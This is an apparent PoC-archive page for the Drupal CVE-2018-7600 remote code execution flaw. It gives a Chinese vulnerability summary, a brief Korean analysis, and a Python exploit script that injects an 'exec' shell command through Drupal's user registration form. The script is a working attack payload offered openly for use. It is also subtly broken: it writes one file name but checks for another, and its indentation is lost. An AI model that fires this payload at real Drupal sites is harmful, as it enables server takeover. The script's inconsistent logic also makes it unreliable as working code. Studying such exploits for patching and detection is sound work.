关联漏洞
标题:
Drupal 安全漏洞
(CVE-2018-7600)
描述:Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。以下版本受到影响:Drupal 7.58之前版本,8.3.9之前的8.x版本,8.4.6之前的8.4.x版本,8.5.1之前的8.5.x版本。
描述
CVE-2018-7600.
介绍
## IGLOO Corp, Won Chi Hyun Drupal RCE 분석 보고서
Drupal RCE CVE-2018-7600
Dont Forget to Put Your Adress into the Script !
Description:
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
Solution:
Upgrade to the most recent version of Drupal 7 or 8 core.
If you are running 7.x, upgrade to Drupal 7.58. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.) If you are running 8.5.x, upgrade to Drupal 8.5.1. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)
```python
#!/usr/bin/python2.7
'''_____________________________________________________________________
|[] R3DXPL0IT SHELL |ROOT]|!"|
|"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"|
|CODED BY > R3DXPLOIT(JIMMY) | |
|EMAIL > RETURN_ROOT@PROTONMAIL.COM | |
|GITHUB > https://github.com/r3dxpl0it | |
|WEB-PAGE > https://r3dxpl0it.Github.io |_|
|_____________________________________________________________________|/|
'''
'''
https://nvd.nist.gov/vuln/detail/CVE-2018-7600#
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600
'''
import sys
import requests
def exploit(target):
pass
proxies = {}
verify = False
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "vulnerable to cve-7600-2018 exploit" | tee r3dxploit.txt'}
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
print ( '[*]' + ' requesting post')
r = requests.post(url, proxies=proxies, data=payload, verify=verify)
try:
scan = requests.get(target + 'vulnerable.txt')
if scan.status_code != 200:
print ( ' not vulnerable to cve-2018-7600 exploit \n')
if scan.status_code == 200:
print (' vulnerable to cve-2018-7600 exploit')
print (' url: ' + target + 'vulnerable.txt \n')
except requests.ConnectionError:
print (' target connection timeout')
except Exception as e :
print ('Connction Failed ' + e )
if __name__ == '__main__':
exploit(sys.argv[1])
```
코드분석.
main -> exploit
argv[1] -target argument
scan. status_code 코드 상태값에 따라서 결과값 도출
이벤트 예외처리
文件快照
[4.0K] /data/pocs/d46fee04dfecb5a6135df0119c24759ebebd09f0
└── [2.8K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。